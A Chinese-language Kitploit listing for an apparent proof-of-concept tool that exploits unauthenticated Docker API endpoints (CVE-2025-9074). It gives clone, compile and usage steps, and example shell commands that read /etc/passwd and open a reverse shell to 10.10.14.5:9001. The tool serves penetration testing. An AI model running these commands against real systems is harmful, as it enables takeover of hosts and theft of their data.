Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
poc-2025-9074 — Docker API CVE-2025-9074 PoC(概念验证)。一个针对CVE-2025-9074的复杂利用框架,针对未经认证的Docker API端点,并集成了交互式命令shell。 | Kitploit
工具/GitHubGitHub/xwpdx0/poc-2025-9074
云基础设施安全权限提升漏洞扫描器容器安全漏洞利用框架漏洞利用后渗透利用渗透测试命令与控制远程访问工具
GitHubxwpdx0/poc-2025-9074

poc-2025-9074

4119个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Docker API CVE-2025-9074 PoC(概念验证)。一个针对CVE-2025-9074的复杂利用框架,针对未经认证的Docker API端点,并集成了交互式命令shell。

查看仓库

CVE-2025-9074 | Docker API CVE-2025-9074 PoC(概念验证)

针对 CVE-2025-9074 的高级利用框架,目标为未经认证的 Docker API 端点,并集成交互式命令 Shell。

Language Platform License

概述

本工具自动利用暴露的、未启用认证机制的 Docker API 实例,允许在目标主机上创建完整容器并执行命令。该工具具备自定义交互式 Shell,可实现无缝的后渗透操作。

注意: 这是自定义的概念验证实现。我并未发现 CVE-2025-9074。

演示

初始利用

利用过程

自动化漏洞检测、镜像拉取、容器创建与初始化

交互式命令执行

命令执行

具备命令执行能力的后渗透 Shell

主要功能

  • 自动化 Docker API 漏洞扫描
  • 挂载主机文件系统的容器部署
  • 交互式后渗透 Shell
  • 远程命令执行接口
  • 反向 Shell 部署模块
  • 彩色终端输出,增强可视性

安装

  1. 克隆仓库
root@kitploit:~
git clone https://github.com/xwpdx0/poc-2025-9074
  1. 编译代码
root@kitploit:~
gcc poc.c -o poc-2025-9074

或者您可以从 Releases 下载二进制文件。

使用方法

root@kitploit:~
./poc-2025-9074

默认目标

针对默认目标 (127.0.0.1:2375) 执行:

root@kitploit:~
./poc-2025-9074

自定义目标

指定自定义的 Docker API 端点:

自定义目标

交互式 Shell

成功利用后,交互式 Shell 提供以下命令:

命令描述
cmd <command>在容器内执行任意命令
revshell <ip> <port>向指定监听器部署反向 Shell
info显示当前容器及目标信息

使用示例

root@kitploit:~
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info

漏洞详情

CVE-2025-9074 影响暴露了 API 端点且缺乏适当认证机制的 Docker 实例。这种配置错误允许未经授权访问 Docker 守护进程,从而实现:

  • 任意容器创建
  • 通过绑定挂载访问主机文件系统
  • 提权机会
  • 远程代码执行

法律免责声明

本工具仅供 教育和授权安全测试 使用。

  • 仅限在您拥有或获得明确书面授权的系统上使用
  • 未经授权访问计算机系统是非法的,将受到法律制裁
  • 作者不对因使用本工具造成的滥用或损害承担任何责任
  • 用户需自行负责遵守适用法律法规

作者

xwpd (@xwpdx0)

许可证

MIT 许可证 – 详见 LICENSE 文件


仅用于负责任的披露和安全研究。

下载工具
exit
终止交互式会话